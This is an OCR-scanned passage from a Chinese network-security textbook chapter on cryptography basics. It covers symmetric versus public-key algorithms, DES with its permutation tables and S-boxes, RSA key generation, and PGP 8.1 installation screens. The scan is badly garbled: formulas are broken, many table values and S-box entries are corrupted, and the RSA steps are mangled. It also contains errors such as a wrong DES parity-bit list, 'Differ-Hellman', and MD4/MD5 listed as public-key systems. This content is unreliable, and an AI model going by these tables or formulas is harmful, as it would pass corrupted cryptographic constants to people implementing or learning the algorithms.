图 .数字 化 的 语音 流 或 者 数字 化 的 视频 图 像 等 。 
密 文 用 CCCipher) 表 示 ,也 是 二 进 制 数据 ,有 时 和 M 一 样 大 ,有 时 稍 大 。 通 过 压缩 和 加 
密 的 结合 ,C 有 可 能 比 P 小 一 些 。 
密 钥 用 K 表示 ,加 密 函 数 正 ,解密 函数 D。K 可 以 是 很 多 数值 里 的 任意 值 , 密 钥 K 的 可 
能 值 的 范围 叫 作 密 钥 空间 。 加 密 和 解密 运算 都 使 用 这 个 密 钥 , 即 运算 都 依赖 于 密 钥 ,并 用 
K 作为 下 标 表示 ,加 解密 函数 表达 为 
Erk(M)=C 
Drk(CC) =M 
DrCEkr(CM)) 一 M 
加 密 和 解密 过 程 如 图 4-1 所 示 。 
jen jen 


加 密 E -| 解密 


明文 原始 明文 


图 4-1 加 密 和 解密 过 程 


4.1.5 对称 算 法 和 公开 密 钥 算法 


l. 对 称 算法 

基于 密 钥 的 算法 通常 有 两 类 : 对 称 算法 和 公开 密 钥 算法 ( 非 对 称 算法 )。 对 称 算法 有 时 
又 叫 传统 密码 算法 ,加 密 密 钥 能 够 从 解密 密 钥 中 推算 出 来 , 反 过 来 也 成 立 。 

在 大 多 数 对 称 算法 中 ,加 解密 的 密 钥 是 相同 的 。 对 称 算法 要 求 发 送 者 和 接收 者 在 安全 
通信 之 前 协商 一 个 密 钥 。 对 称 算法 的 安全 性 依赖 于 密 钥 ,泄露 密 钥 就 意味 着 任何 人 都 能 对 
消息 进行 加 解密 。 对 称 算 法 的 加 密 和 解密 表示 为 

Ekx(M) =C 
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Dk(C) =M 
对 称 算法 可 分 为 两 类 : 序列 密码 ( 流 密码 ) 与 分 组 密码 。 序 列 密码 一 直 是 作为 军 方 和 政 
府 使 用 的 主要 密码 技术 之 一 , 它 的 主要 原理 是 ,通过 伪 随 机 序列 发 生 器 产生 性 能 优良 的 伪 随 
机 序列 ,使 用 该 序列 加 密 信息 流 ,( 逐 比特 加 密 ) 得 到 密 文 序列 ,所 以 ,序列 密码 算法 的 安全 强 
度 完 全 决定 于 伪 随 机 序列 的 好 坏 。 伪 随机 序列 发 生 器 是 指 输入 真 随机 的 较 短 的 密 钥 (种 子 ) 
通过 某 种 复杂 的 运算 产生 大 量 的 伪 随 机 位 流 。 
序列 密码 算法 将 明文 逐 位 转换 成 密 文 。 该 算法 最 简单 的 应 用 如 图 4-2 所 示 。 密 钥 流 发 
生 器 输出 一 系列 比特 流 : Ki Koen ,Ki。 密 钥 流 跟 明 文 比特 流 Pis Potta P; 进行 异 或 运算 
产生 密 文 比特 流 。 
C, = P, OK; 
在 解密 端 , 密 文 流 与 完全 相同 的 密 钥 流 异 或 运算 恢复 出 明文 流 。 


密 钥 流 K 
WIXCP, 


加 密 EXC 解密 


图 4-2 序列 密码 算法 


分 组 密码 是 将 明文 分 成 固定 长 度 的 组 ( 块 ) ,如 64b 一 组 ,用 同一 密 钥 和 算法 对 每 一 块 加 
密 , 输 出 也 是 固定 长 度 的 密 文 。 

著名 的 分 组 密码 包括 出 自 IBM 被 美国 政府 正式 采纳 的 数据 加 密 算法 (Data Encryption 
Algorithm. DEA) .由 中 国学 者 Xuejia Lai 和 James L. Massey 在 苏黎世 的 ETH 开发 的 国 
际 数据 加 密 算法 IDEA(International Data Encryption Algorithm) .比利时 Joan Daemen 和 
Vincent Rijmen 提交 被 美国 国家 标准 和 技术 研究 所 (US National Institute of Standards 
and Technology,NIST) 选 为 美国 高 级 加 密 标准 (AES) 的 Rijndael, 

2. 公开 密 钥 算法 

公开 密 钥 算法 中 用 作 加 密 的 密 钥 不 同 于 用 作 解 密 的 密 钥 ,而 且 解 密 密 钥 不 能 根据 加 密 
密 钥 计算 出 来 (至 少 在 合理 假定 的 长 时 间 内 ) ,所 以 加 密 密 钥 能 够 公开 ,每 个 人 都 能 用 加 密 密 
钥 加 密 信 息 , 但 只 有 解密 密 钥 的 拥有 者 才能 解密 信息 。 在 公开 密 钥 算法 系统 中 ,加 密 密 钥 叫 
作 公开 密 钥 ( 简 称 公 钥 ) ,解密 密 钥 叫 作 秘密 密 钥 (私有 密 钥 ,简称 私 钥 ) 。 

公开 密 钥 算法 主要 用 于 加 密 / 解 密 、 数 字 签名 、 密 钥 交 换 。 自 从 1976 年 公 钥 密码 的 思想 
提出 以 来 ,国际 上 已 经 出 现 了 许多 种 公 钥 密码 体制 ,比较 流行 的 有 基于 大 整数 因子 分 解 问题 
的 RSA 体制 和 Rabin 体制 .基于 有 限 域 上 的 离散 对 数 问题 的 Differ-Hellman 公 钥 体制 和 
ElGamal 体制 、 基 于 椭圆 曲线 上 的 离散 对 数 问 题 的 Differ-Hellman 公 钥 体制 和 ElGamal 体 
制 。 这 些 密码 体制 有 的 只 适合 于 密 钥 交换 ,有 的 只 适合 于 加 密 /解密 。 

公开 密 钥 K 加 密 表示 为 : Er M) = C. 公开 密 钥 和 私人 密 钥 是 不 同 的 ,用 相应 的 私人 
密 钥 K: 解密 可 表示 为 : Di; (CO) = M. 
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4.2 DES 对 称 加 密 技术 


4.2.1 DES 对 称 加 密 技术 简介 


最 著名 的 保密 密 钥 或 对 称 密 钥 加 密 算 法 DES (Data. Encryption Standard) 是 由 IBM 公 
司 在 20 世纪 70 年 代 发 展 起 来 的 ,并 经 过 美国 政府 的 加 密 标 准 筛选 后 ,于 1976 年 11 月 被 美 
国政 府 采用 , DES 随后 被 美国 国家 标准 局 和 美国 国家 标准 协会 (American National 
Standard Institute, ANSI) 承认 。 加 密 算法 要 达到 的 目的 有 以 下 4 点 。 

(1) 提供 高 质量 的 数据 保护 ,防止 数据 未 经 授权 的 泄漏 和 未 被 察觉 的 修改 ; 

(2) 具有 相当 高 的 复杂 性 ,使 得 破译 的 开销 超过 可 能 获得 的 利益 ,同时 又 要 便于 理解 和 
掌握 ; 

(3) DES 密码 体制 的 安全 性 应 该 不 依赖 于 算法 的 保密 ,其 安全 性 仅 以 加 密 密 钥 的 保密 
为 基础 ; 

(4) 实现 经 济 ,运行 有 效 , 并 且 适 用 于 多 种 完全 不 同 的 应 用 。 


4.2.2 DES 的 安全 性 


DES 算法 正式 公开 发 表 以 后 ,引起 了 一 场 激 烈 的 争论 。1977 年 , Diffie 和 Hellman 提 
出 了 制造 一 个 每 秒 能 测试 106 个 密 钥 的 大 规模 芯片 ,这 种 芯片 的 机 器 大 约 一 天 就 可 以 搜索 
DES 算法 的 整个 密 钥 空间 ,制造 这 样 的 机 器 需要 两 千 万 美元 。 

1993 年 ,R. Session 和 M. Wiener 给 出 了 一 个 非常 详细 的 密 钥 搜索 机 器 的 设计 方案 , 它 
基于 并 行 的 密 钥 搜索 芯片 ,此 芯片 每 秒 测试 5X107 个 密 钥 ,当时 这 种 芯片 的 造价 是 10. 5 美 
元 ,5760 个 这 样 的 芯片 组 成 的 系统 需要 10 万 美元 ,这 一 系统 平均 1.5 天 即 可 找到 密 钥 ,如 
果 利 用 10 个 这 样 的 系统 ,费用 是 100 万 美元 ,但 搜索 时 间 可 以 降 到 2. 5 小 时 。 可 见 这 种 机 
制 是 不 安全 的 。 

1997 年 1 月 28 日 ,美国 的 RSA 数据 安全 公司 在 互联 网 上 开展 了 一 项 名 为 “ 密 钥 挑战 ” 
的 竞赛 ,悬赏 一 万 美元 ,破解 一 段 用 56b 密 钥 加 密 的 DES 密 文 。 计 划 公 布 后 引起 了 网 络 用 
户 的 强力 响应 。 一 位 名 叫 Rocke Verser 的 程序 员 设 计 了 一 个 可 以 通过 互联 网 分 段 运行 的 
密 钥 穷 举 搜索 程序 ,组 织 实施 了 一 个 称 为 DESHALL 的 搜索 行动 ,成 千 上 万 的 志愿 者 加 入 
到 计划 中 ,在 计划 实施 的 第 96 天 , 即 挑战 赛 计 划 公 布 的 第 140 R.1997 4Æ 6 H 17 日 晚上 10 
点 39 分 ,美国 盐湖 城 Inetz 公司 的 职员 Michael Sanders 成 功 地 找到 了 密 钥 ,在 计算 机 上 显 
示 了 明文 :“The unknown message is: Strong cryptography makes the world a safer 


place", 
4.2.3 DES 算法 的 原理 


DES 算法 的 入 口 参数 有 三 个 : Key、Data、Mode。 其 中 ,Key 为 8B 共 64b, 是 DES 算法 
的 工作 密 钥 ; Data 也 为 8B 共 64b, 是 要 被 加 密 或 被 解密 的 数据 ,Mode 为 DES 的 工作 方式 
有 两 种 : 加 密 或 解密 。 

DES 算法 是 这 样 工 作 的 : 如 Mode 为 加 密 , 则 用 Key 对 数据 Data 进行 加 密 , 生 成 Data 
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的 密码 形式 (64b) 作 为 DES 的 输出 结果 ; Mode 为 解密 , 则 用 Key 对 密码 形式 的 数据 
Data 解密 ,还 原 为 Data 的 明码 形式 (64b) 作 为 DES 的 输出 结果 。 

在 通信 网 络 的 两 端 ,双方 约定 一 致 的 Key, 在 通信 的 源 点 用 Key 对 核心 数据 进行 DES 
加 密 , 然 后 以 密码 形式 在 公共 通信 网 (如 电话 网 ) 中 传输 到 通信 网 络 的 终点 ,数据 到 达 目 的 地 
后 ,用 同样 的 Key 对 密码 数据 进行 解密 , 便 再 现 了 明码 形式 的 核心 数据 。 这 样 , 便 保证 了 核 
心 数据 (如 PIN,MAC 等 ) 在 公共 通信 网 中 传输 的 安全 性 和 可 靠 性 。 通 过 定期 在 通信 网 络 
的 源 端 和 目的 端 同时 改 用 新 的 Key, 便 能 更 进一步 提高 数据 的 保密 性 ,这 正 是 现在 金融 交易 
网 络 的 流行 做 法 。 


4.2.4 DES 算法 详 述 


第 一 步 : 变换 明文 。 对 给 定 的 64b 的 明文 x, 首先 通 过 一 个 置换 IP. 表 来 重新 排列 x, 从 
而 构造 出 64b 的 zo, — IPGO — LR, ,其 中 ,Lo 表示 xo 的 前 32b,R。 表示 xo 的 后 32b。 
第 二 步 : 按照 规则 和 迭代。 规则 为 


输入 64 位 明文 
L; = Ria i 
R: = Lia Q f(RGa,K) (一 1,2,…,16) PARRE 
经 过 第 一 步 变换 已 经 得 到 L。 和 R。 的 值 , 其 中 ， = 
符号 四 表示 的 数学 运算 是 异 或 ,f 表示 一 种 置换 ， Lo Ro 
由 S ARRIR LK, JE — Ho h ARAE en i 
的 比特 块 。f 和 KK; 将 在 后 面 介绍 。 LFR 
第 三 步 ， 对 Las Re RUNI IP-' 做 着 置换 ,就 得 到 [| R-L QR. Ki", 2716) 
了 密 文 mw 的 加 密 过 程 如 图 4-3 所 示 。 和 
从 图 4-3 中 可 以 看 出 ,DES 加 密 需 要 4 个 关键 四 逆 置 换 表 
点 ;JP 置换 表 和 IPC EUR Re ROC 信子 密 铀 ETE 


K; S WTH. 
1. IP 置换 表 和 IP-! 逆 置换 表 mor m 
输入 的 64 位 数据 按 置换 IP 表 进 行 重新 组 合 ,并 把 输出 分 为 Lo Re 两 部 分 ,每 部 分 各 长 
32 位 ,其 置换 IP 表 如 表 4-1 所 示 。 
表 4-1 PERR 


58 50 42 34 26 18 10 2 60 52 44 36 28 20 12 
62 54 46 38 30 22 14 6 64 56 48 40 32 24 16 
57 49 41 33 25 17 9 1 59 51 43 35 27 19 11 
61 53 45 37 29 21 13 5 63 55 47 39 31 23 15 


oc 0 & 


将 输入 64 位 的 第 58 位 换 到 第 1 位 ,第 50 位 换 到 第 2 位 ,以 此 类 推 , 最 后 一 位 是 原来 的 
第 7 位 。Lo Re 则 是 换 位 输出 后 的 两 部 分 ,Le 是 输出 的 左 32 位 ,Re 是 右 32 位 。 例 如 : 置换 
前 的 输入 值 为 Di D; D; … D6 , 则 经 过 初始 置换 后 的 结果 为 : Lo = Dss Da Di Ro = Ds: 
Dat Dz. 

经 过 16 次 迭代 运算 后 ,得 到 Lis Ri ,将 此 作为 输入 LECHE ELI aR h. 
置换 正好 是 初始 置 的 道 运算 ,例如 ,第 1 位 经 过 初始 置换 后 ,处 于 第 40 位 ,而 通过 逆 置 换 
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IP ,又 将 第 40 位 换 回 到 第 1 位 ,其 逆 置 换 IP“ 规 则 如 表 4-2 所 示 。 
R42 逆 置 换 表 IO 


40 8 48 16 56 24 64 32 39 47 15 55 23 63 31 
38 6 46 14 54 22 62 30 37 5 45 13 53 21 61 29 
36 4 44 12 52 20 60 28 35 3 43 11 51 19 59 27 
34 2 42 10 50 18 58 26 33 1 41 9 49 17 57 25 
2. 函数 fo 
函数 f 有 两 个 输入 : 32 位 的 R- 和 48 位 K;,f 函数 的 处 理 流程 如 图 4-4 所 示 。 
32 位 Ri1 
1 
变换 
ast] 
人 -一 tk 
48 位 
(CS (5) (5) G0 CS) C0 6D GOD 
p» 
变换 
Y 
32 位 输出 


图 4-4 了 函数 的 处 理 流程 


HAKMAR E 2E B ETE JE R: ÉY 32 位 中 选取 某 些 位 ,构成 48 位 。 即 巨 将 32b 扩 
展 变换 为 48b ,变换 规则 根据 已 位 选择 表 , 如 表 4-3 所 示 。 
表 4-3 巨变 换 32b 扩展 变换 为 48b 
32 4. X 3$ 4 $ 4 5 $9 1? $$ 9 8 9 dé i 


12 13 12 13 14 15 16 17 16 17 18 19 20 21 20 21 
22 23 24 25 24 25 26 27 28 29 28 29 30 31 32 1 


K: 是 由 密 钥 产生 的 48b 串 ,具体 的 算法 为 将 EE 的 选 位 结果 与 K, 做 异 或 操作 ,得 到 一 
个 48b 输出 。 分 成 8 组 ,每 组 6b, 作 为 8 个 S 盒 的 输入 。 
每 个 S 盒 输出 4b, 共 32b,S 盒 的 工作 原理 将 在 下 面 介绍 。S 盒 的 输出 作为 P 变换 的 输 
入 ,PP 的 功能 是 对 输入 进行 置换 ,P 换 位 表 如 表 4-4 Bron. 
表 4-4 PRR 
716 7 2 201 29 12 28 17 1 15 23 26 5 18 31 10 


3. FEH k 


假设 密 钥 为 ki KEH 64b, 但 是 其 中 第 8、16、24、32、40、48、64 位 用 作 奇 偶 校 验 位 ,实际 上 
密 钥 长 度 为 56b。K 的 下 标 i 的 取 值 范围 是 1~16, 用 16 轮 来 构造 。 构 造 过 程 如 图 4-5 所 示 。 


72 计算 机 网 络 安全 与 实验 教程 (第 二 版 ) 


64 位 密 钥 字符 串 玉 
Y 
PC 变换 
56b 
28b 28b 

C, Do 

i i 

LS, LS, 

D i 

G D, 

| e| PC 变换 | 一 48 位 K 

Y 

LS LS; 

1 1 

C; D; 

f | -| PC; 变 换 广 一 48 位 K 
1 1 
LSi6 LSis 

i i 

Cie Dis 

= PC: 变换 H 48 位 Kie 
4-5 FEHER 


首先 ,对 于 给 定 的 密 钥 KH] PCI 变换 进行 选 位 , 选 定 后 的 结果 是 56 位 , 设 其 前 28 


位 为 Cu ,后 28 位 为 De。PC1 选 位 如 表 4-5 所 示 。 


表 4-5 PC1 选 位 表 
57 49 4 33 25 17 9 1 58 50 42 34 
10 2 59 51 43 35 27 19 11 3 60 52 
63 55 47 39 31 23 15 7 62 54 46 38 
14 6 61 53 45 37 29 21 13 5 28 20 


第 一 轮 : 对 C RUE EE LS, 得 到 C, ,对 D, 做 左 移 LS, 得 到 Di ,对 C D, 应 用 PC2 进行 


选 位 ,得 到 K;。 其 中 ,LS, 是 左 移 的 位 数 , 如 表 4-6 所 示 。 
表 4-6 LS 移 位 表 


K 4-6 中 的 第 一 列 是 LS ,第 二 列 是 LS, ,以 此 类 推 。 左 移 的 原理 是 所 有 二 进位 向 左 移 


动 ,原来 最 右边 的 比特 位 移动 到 最 左边 。 其 中 ,PC2 如 表 4-7 所 示 。 
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表 4-7 PC2 选 位 表 


14 17 n 24 1 5 3 28 15 6 21 10 
23 19 12 4 26 8 16 T 27 20 13 2 
41 52 31 37 47 55 30 40 51 45 33 48 
44 49 39 56 34 53 46 42 50 36 29 32 


第 二 轮 : 对 C ,Di 做 左 移 LS 得 到 C, 和 D; ,进一步 对 C, D. i Hi PC2 进行 选 位 ,得 到 
K,。 如 此 继续 ,分 别 得 到 K;,K,,… ,Ki 。 

4. S 盒 的 工作 原理 

SAI 6b 作为 输入 ,而 以 4b 作为 输出 ,现在 以 Sl 为 例 说 明 其 过 程 。 假 设 输入 为 A— 
aiazaza,asas D] wasasas 所 代表 的 数 是 0 一 15 之 间 的 一 个 数 ( 行 ), 记 为 k= 二 azasasas; 由 
aias 所 代表 的 数 是 0 一 3 间 的 一 个 数 ( 列 ), 记 为 h 二 aas。 在 Sl 的 h 行 ,k 列 找到 一 个 数 B， 
BE 0-15 之 间 , 它 可 以 用 4b 二进制 表示 ,为 B==b152536b; ,这 就 是 S1 的 输出 。 例 如 , 当 向 
Sl 输入 011011 时 ,开头 和 结尾 的 组 合 是 01, 所 以 选中 编号 为 1 的 替代 表 , 根 据 中 间 4 位 
1101 , 选 定 13 列 ,查找 表 中 第 1 行 第 13 列 所 示 的 值 为 5, 即 输出 0101, 这 4 位 就 是 经 过 替代 
后 的 值 , 按 此 进行 ,输出 32 位 。S 盒 由 8 张 数据 表 组 成 ,如 图 4-6 所 示 。 


Sl; 


14 4 13 1 2 15 11 8 3 10 6 12 5 9 0 7 
0 | 15 7 4 14 2 13 1 10 6 | 12 11 9 5 3 8 
4 1 14 8 13 6 2 | 11 15 12 9 7 3 10 5 0 
15 | 12 8 2 4 9 1 7 5 11 3 14 | 10 0 6 13 
S2: 
15 1 8 14 6 11 3 4 9 T 2 13 12 0 5 10 
3 | 13 4 7 | 15 2 8 14 12 0 1 10 6 9 11 5 
0 |14 7 11 | 10 4 | 13 1 5 8 12 6 9 3 2 15 
13 8 10 1 3 15 4 2 1 6 7 12 0 5 14 9 
S3: 

10 0 9 14 6 3 15 5 d 13 12 7 11 4 2 8 
13 7 0 9 3 4 6 | 10 2 8 5 | 14 12 | 15 1 
13 6 4 9 8 15 3 0 11 1 2 |12 5 | 10 14 7 

1 |10 13 0 6 9 8 7 4 15 14 3 11 5 2 12 
S4: 

7 13 14 3 0 6 9 10 d 2 8 5 11 12 4 15 
13 8 11 5 6 15 0 3 4 7 2 12 1 10 | 14 9 
10 6 9 0 12 11 7 13 | 15 1 3 14 5 2 8 4 

3 15 0 6 10 1 13 8 9 4 5 11 12 € 2 14 


图 4-6 组 成 S 盒 的 8 张 数据 表 
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S5: 
2 12 4 1 7 10 1 6 8 5 3 15 13 0 14 9 
14 11 2 12 4 F 13 1 5 0 15 10 3 9 8 6 
4 2 1 11 10 13 T 8 15 9 12 5 6 3 0 | 14 
11 8 | 12 1 14 2 |13 6 15 0 9 10 4 5 3 
S6: 
12 1 10 15 9 2 6 8 0 13 3 4 14 7 5 11 
10 |15 4 2 7 12 9 5 6 1 |13 14 O| a 3 8 
9 |14 15 5 2 8 12 3 7 0 4 10 1 |13 11 6 
4 3 2 12 9 15 10 11 14 1 7 6 0 8 13 
S7: 
4 11 2 14 15 0 8 13 3 12 9 7 5 10 6 1 
13 0 | 11 T 4 9 1 10 | 14 3 5 12 2 15 8 6 
1 4 jn 13 12 3 T 14 | 10 15 6 8 0 5 9 2 
6 11 | 13 8 1 4 10 7 9 5 0 15 14 2 3 12 
S8: 
13 2 8 4 6 15 11 1 10 9 3 14 5 0 12 7 
1 | 15 13 8 10 3 7 4 12 5 6 11 0 14 9 2 
7 |i 4 1 9 12 14 2 0 6 10 13 | 15 3 5 8 
2 1 14 v 4 10 8 |13 15 | 12 9 0 3 5 6 | 11 


图 4-6 (5D 


以 上 介绍 了 DES 算法 的 加 密 过 程 ,DES 算法 的 解密 过 程 是 一 样 的 ,区 别 仅 在 于 第 一 次 
迭代 时 用 子 密 钥 Ki ,第 二 次 用 Ki ,最 后 一 次 用 Ko ,算法 本 身 并 没有 任何 变化 。DES 的 算 
法 是 对 称 的 , 既 可 用 于 加 密 又 可 用 于 解密 。 

DES 算法 的 程序 实现 见 实验 七 。 


4.2.5 DES 算法 改进 


DES 算法 具有 比较 高 的 安全 性 ,到 目前 为 止 ,除了 用 穷 举 搜索 法 对 DES 算法 进行 攻击 
外 ,还 没有 发 现 更 有 效 的 办 法 。 而 56b 长 的 密 钥 的 穷 举 空间 为 2”, 这 意味 着 如 果 一 台 计 算 
机 的 速度 是 每 1s 检测 一 百 万 个 密 钥 , 则 它 搜索 完全 部 密 钥 就 需要 将 近 2285 年 的 时 间 , 可 
见 ,这 是 难以 实现 的 ,当然 , 随 着 科学 技术 的 发 展 , 当 出 现 超 高 速 计算 机 后 ,可 以 考虑 把 DES 
密 钥 的 长 度 再 增长 一 些 , 以 此 来 达到 更 高 的 保密 程度 。 


4.3 RSA 公 钥 加 密 技 术 


RSA 公 钥 加 密 算法 是 1977 年 由 罗 纳 德 。 李维斯 特 (Ron RivesO 、 阿 迪 。， 萨 葛 尔 (Adi 
Shamir) 和 伦 纳 德 。 阿 德 曼 (Leonard Adleman) 一 起 提出 的 。 当 时 他 们 三 人 都 在 麻 省 理工 
学 院 工作 。RSA 就 是 他 们 三 人 姓氏 开头 字母 拼 在 一 起 组 成 的 。 
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RSA 是 目前 最 有 影响 力 的 公 钥 加 密 算法 , 它 能 够 抵抗 到 目前 为 止 已 知 的 绝 大 多 数 密码 
攻击 ,已 被 ISO 推荐 为 公 钥 数据 加 密 标 准 。 

今天 只 有 短 的 RSA 钥匙 才 可 能 被 强力 方式 解 破 。 到 2008 年 为 止 , 世 界 上 还 没有 任何 可 
靠 的 攻击 RSA 算法 的 方式 。 只 要 其 密 钥 的 长 度 足够 长 ,用 RSA 加 密 的 信息 实际 上 是 不 能 被 
解 破 的 。 但 在 分 布 式 计算 和 量子 计算 机 理论 日 趋 成 熟 的 今天 ,RSA 加 密 安 全 性 受到 了 挑战 。 

RSA 算法 基于 一 个 十 分 简单 的 数论 事实 : 将 两 个 大 素数 相 乘 十 分 容易 ,但 那 时 想 要 对 
其 乘积 进行 因 式 分 解 却 极其 困难 ,因此 可 以 将 乘积 公开 作为 加 密 密 钥 。 


4.3.1 RSA 算法 的 原理 


所 谓 的 公开 密 钥 密码 体制 就 是 使 用 不 同 的 加 密 密 钥 与 解密 密 钥 ,RSA 公开 密 钥 密码 体 
制 是 一 种 基于 大 数 不 可 能 质 因数 分 解 假设 的 公 钥 体系 ,在 公开 密 钥 密码 体制 中 ,加 密 密 钥 
( 即 公 开 密 钥 )PK 是 公开 信息 ,而 解密 密 钥 ( 即 秘密 密 钥 )SK 是 需要 保密 的 。 加 密 算法 E A 
解密 算法 卫 也 都 是 公开 的 。 虽 然 秘密 密 钥 SK 是 由 公开 密 钥 PK 决定 的 ,但 却 不 能 根据 PK 
计算 出 SK。 

正 是 基于 这 种 理论 ,1978 年 出 现 了 著名 的 RSA 算法 , 它 通常 是 先生 成 一 对 RSA 密 钥 ， 
其 中 之 一 是 保密 密 钥 , 由 用 户 保存 ; 另 一 个 为 公开 密 钥 , 可 对 外 公开 ,甚至 可 在 网 络 服务 器 
中 注册 。 为 提高 保密 强度 ,RSA 密 钥 至 少 为 500b 长 ,一 般 推 荐 使 用 1 024b。 这 就 使 加 密 的 
计算 量 很 大 。 为 减少 计算 量 , 在 传送 信息 时 , 常 采用 传统 加 密 方法 与 公开 密 钥 加 密 方法 相 结 
合 的 方式 , 即 信息 采用 改进 的 DES 或 IDEA 对 话 密 钥 加 密 ,然后 使 用 RSA 密 钥 加 密 对 话 密 
钥 和 信息 摘要 。 对 方 收 到 信息 后 ,用 不 同 的 密 钥 解密 并 可 核对 信息 摘要 。 

RSA 体制 可 以 简单 描述 如 下 。 

CD 生成 两 个 大 素数 p 和 g。 

(2) 计算 这 两 个 素数 的 乘积 n= 二 pXg。 

(3) 计算 小 于 nn 并且 与 互 质 的 整数 的 个 数 , 即 欧 拉 函数 p(n) = (p 一 1)(g 一 1)。 

(4) 选择 一 个 随机 数 5 满足 1 二 5 二 eG JH b Mga) 互 质 , 即 gcb(0,p(Cz)) 一 1。 

(5) 计算 ab—1 mod g(n)。 

(6) 保密 a、p Hg ARF n Hb, 

利用 RSA 加 密 时 ,明文 以 分 组 的 方式 加 密 : 每 一 个 分 组 的 比特 数 应 该 小 于 logen 比特 。 
MERX ae 时 ,利用 公 钥 (5, 来 计算 c xb. mod n 就 可 以 得 到 相应 的 密 文 c<。 解 密 的 时 
候 , 通 过 计算 ca mod n 就 可 以 恢复 出 明文 x。 

选取 的 素数 p 和 g 要 足够 大 ,从 而 乘积 足够 大 ,在 事先 不 知道 p 和 g 的 情况 下 分 解 ? 
是 计算 上 不 可 行 的 。 程 序 的 实现 见 实验 8。 

常用 的 公 钥 加 密 算法 包括 RSA 密码 体制 .ElGamal 密码 体制 和 散 列 函 数 密码 体制 
(MD4、MD5 等 )。 


4.3.2 RSA 算法 的 安全 性 


RSA 的 安全 性 依赖 于 大 数 分 解 ,但 是 否 等 同 于 大 数 分 解 一 直 未 能 得 到 理论 上 的 证 明 ， 
因为 没有 证 明 破 解 RSA 就 一 定 需 要 做 大 数 分 解 。 假 设 存在 一 种 无 须 分 解 大 数 的 算法 , 那 它 
肯定 可 以 修改 成 为 大 数 分 解 算法 。RSA 的 一 些 变种 算法 已 被 证 明 等 价 于 大 数 分解 。 不 管 
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怎样 ,分 解 n 是 最 显然 的 攻击 方法 。 人 们 已 能 分 解 多 个 十 进 制 位 的 大 素数 。 因 此 , 模 数 n 必 
须 选 大 一 些 , 因 具体 适用 情况 而 定 。 


4.3.3 RSA 算法 的 速度 


由 于 进行 的 都 是 大 数 计算 ,使 得 RSA 最 快 的 情况 也 比 DES 慢 上 好 几 倍 ,无 论 是 软件 还 
是 硬件 实现 ,速度 一 直 是 RSA 的 缺陷 。 一 般 来 说 ,RSA 只 用 于 少量 数据 加 密 。RSA 的 速 
度 比 对 应 同样 安全 级 别 的 对 称 密码 算法 要 慢 1 000 倍 左右 。 


4.4 PGP 加 密 技 术 


4.4.1 PGP 简介 


互联 网 上 目前 应 用 比较 多 的 另 一 种 安全 技术 是 PGP(Pretty Good Privacy)。 它 是 软件 
工程 师 齐 默 曼 于 1991 年 发 明 的 ,任何 人 都 可 以 用 这 个 工具 建立 自己 的 私 钥 对 自己 的 信息 进 
mE. PGP 加 密 技 术 现 在 有 很 多 种 ,其 中 包括 用 于 个 人 文件 和 电子 邮件 加 密 的 软件 。 

PGP 是 一 个 基于 RSA 公 钥 加 密 体系 的 邮件 加 密 软件 。PGP 加 密 系统 是 采用 公 ihv 
加 密 与 传统 密 钥 加 密 相 结合 的 一 种 加 密 技 术 。 它 使 用 一 对 数学 上 相关 的 钥匙 ,其 中 一 个 ( 公 
钥 ) 用 来 加 密 信息 , 另 一 个 ( 私 钥 ) 用 来 解密 信息 。PGP 是 一 个 公 钥 加 密 程序 ， bla 
ipia PGP 公 钥 加 密 的 信息 只 能 用 私 钥 解 密 。 使 用 PGP 公 钥 加 密 法 ,可 以 广泛 传 

播 公 钥 ,同时 安全 地 保存 好 私 钥 。 由 于 只 有 你 可 以 拥有 私 钥 ,任何 人 都 可 以 用 你 的 公 钥 加 密 
sw om， PGP 制作 一 个 加 密 信息 不 需要 数字 证 
书 , 甚 至 连 浏览 器 都 不 需要 ,只 要 有 一 个 电子 邮件 软件 和 一 个 密 钥 生成 软件 就 可 以 了 。 企 业 
可 以 用 PGP 来 进行 内 部 密 钥 管理 ,甚至 在 数据 传 上 互联 网 之 前 就 进行 加 密 。 


4.4.2 PGP 加 密 软 件 介绍 


使 用 PGP 软件 可 以 简捷 高 效 地 实现 邮件 或 者 文件 的 加 密 、 数 字 签 名 。PGP 8. 1 的 安装 
界面 如 图 4-7 所 示 。 


Welcome 


Welcome to the PGP 8.1 installer. We strongly recommend. 
that you exit all Windows programs before continuing. 


Thank you for using our products. 
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因为 是 第 一 次 安装 ,所 以 在 “用 户 类 型 > 对话 框 中 选择 No. Iam a New User, 如 图 4-8 
所 示 。 


User Type 
Please tellus if you have existing PGP Keyrings you'd ike to use. 


Do you already have PGP keyrings you would like to use? 


图 4-8 选择 用 户 类 型 


根据 需要 选择 安装 的 组 件 ,一 般 根 据 默认 选项 就 可 以 了 : PGPdisk Volume Security 的 
功能 是 提供 磁盘 文件 系统 的 安全 性 ; PGPmail for Microsoft Outlook/Outlook Express 提 
供 邮 件 的 加 密 功能 ,如 图 4-9 所 示 。 安 装 完成 如 图 4-10 所 示 ,需要 重新 启动 机 器 。 


Select Components 
Choose the components Setup will install 


Select the componente you want to instal, and clear the components you do not want to 
inst 
Description 
CHE PGPmai for ICQ This component includes the 
KÈ] PGPma for Microsoft Outlook program files for PGPdisk 


3] PGPmai for Microsoft Outlook Express vamen, 


DE PGPmai for Qualcomm Eudora 
D@ PGPmai for GroupWise 


Space Required on C: 
Space Available on C: 


图 4-9 选择 安装 组 件 


重新 启动 后 在 程序 中 找到 PGP 下 的 PGPkeys, 启 动 后 如 图 4-11 所 示 , 单 击 vo HL. TE 
用 户 信息 对 话 框 中 输入 相应 的 姓名 和 电子 邮件 地 址 ,如 图 4-12 所 示 , 在 PGP 密码 输入 框 中 
输入 8 位 以 上 的 密码 并 确认 ,如 图 4-13 所 示 , 生 成 密 钥 如 图 4-14 所 示 。 

使 用 生成 的 密 钥 就 可 以 加 密 文 件 和 邮件 了 .具体 使 用 参见 实验 9。 


78 计算 机 网 络 安全 与 实验 教程 (第 二 版 ) 


PGP 8.1 install complete. 


PGP 8.1 has been successfully installed. Before you can use 
the program, you must restart your computer. 


VV. es | want to restart my computer now] 


Tf PGPkeys 
File Edit View Keys Server Groups Help 
» 


Description 


411 产生 密 钥 


PGP Key Generation ITI 


Name and Email Assignment 
Every key pair must have a name associated with i The name and email address let 
your correspondents know that the public key they are using belongs to you. 


Eul name: nalinei 


By associating an email address with your key pair, you will enable PGP to assist your 
correspondents in selecting the correct public key when communicating with you. 


Emaiaddess [malimei@hebtu. edu. cn) 


EE E| 


412 用户 信 息 


第 4 章 密码 学 基础 79 


PGP Key Generation Wizard 


Passphrase Assignment 
Your private key will be protected by a passphrase. It is important that you keep this 
passphrase secret and do not write it down. 


Your passphrase should be at least 8 characters long and should contain 
